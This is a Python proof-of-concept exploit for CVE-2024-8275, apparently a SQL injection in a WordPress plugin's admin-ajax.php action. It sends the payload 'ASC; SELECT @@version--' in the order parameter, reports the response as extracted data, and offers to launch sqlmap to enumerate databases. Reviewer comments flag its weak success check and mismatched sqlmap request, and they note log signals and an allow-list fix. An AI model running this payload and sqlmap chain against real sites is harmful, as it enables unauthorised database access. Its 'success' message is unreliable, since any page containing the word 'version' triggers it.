POC / Poc-CVE-2024-8275.py PY
import os
import subprocess

import requests

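# Proof-of-concept probe for CVE-2024-8275 (per this file's name). It sends one
# GET request whose `order` parameter carries SQL text, prints the response,
# and then offers to run sqlmap against the same endpoint.
#
# Reviewer notes for readers assessing or defending against this script:
# - The "success" test below is only a substring match on the word "version",
#   so a positive result is not evidence that any SQL was executed.
# - A sort direction should only ever be ASC or DESC. Any other `order` value
#   reaching admin-ajax.php with this action is a useful signal in web-server
#   or WAF logs.
# - A sort direction cannot be passed as a bound query parameter, so the usual
#   server-side fix is an allow-list on the value. For the fixed release, see
#   the vendor advisory for this CVE.
# - NOTE(review): this file does not show that admin-ajax.php actually exposes
#   the `tribe_has_next_event` action; confirm against the advisory.

REQUEST_TIMEOUT_SECONDS = 10  # without a timeout, requests can block forever

url = "http://vulnerable-site.com/wp-admin/admin-ajax.php"  # placeholder host as published

payload = {
    "action": "tribe_has_next_event",
    "order": "ASC; SELECT @@version--"
}

try:
    response = requests.get(url, params=payload, timeout=REQUEST_TIMEOUT_SECONDS)

    # Weak heuristic: any HTTP 200 page that contains the word "version"
    # (an error page, a generator tag, ...) takes this branch.
    if response.status_code == 200 and "version" in response.text:
        print("[+] Vulnerability Exploited Successfully!")
        print("Extracted Database Version: ", response.text)

        # NOTE(review): the probe above sends its parameters in the query
        # string, while this command sends them via --data (request body), so
        # the two do not exercise the same request.
        sqlmap_data = "action=tribe_has_next_event&order=ASC"
        sqlmap_command = f'sqlmap -u "{url}" --data "{sqlmap_data}" --dbs --batch'
        # The argv form is what gets executed. The string above is only shown
        # to the user, so characters in `url` are never parsed by a shell.
        sqlmap_argv = ["sqlmap", "-u", url, "--data", sqlmap_data, "--dbs", "--batch"]
        print("\n[+] Generated sqlmap command:")
        print(sqlmap_command)

        run_sqlmap = input("\nDo you want to run the sqlmap command? (yes/no): ").lower()
        if run_sqlmap == "yes":
            # The exit status is not checked, as with the os.system call this replaces.
            subprocess.run(sqlmap_argv, check=False)
        else:
            print("You can copy and paste the command to run manually.")

    else:
        print("[-] Exploit failed or target not vulnerable.")

except Exception as e:
    # Top-level boundary of a script: report network errors, timeouts and a
    # missing sqlmap binary without a traceback.
    print("[-] An error occurred while attempting the exploit.")
    print(f"Error: {e}")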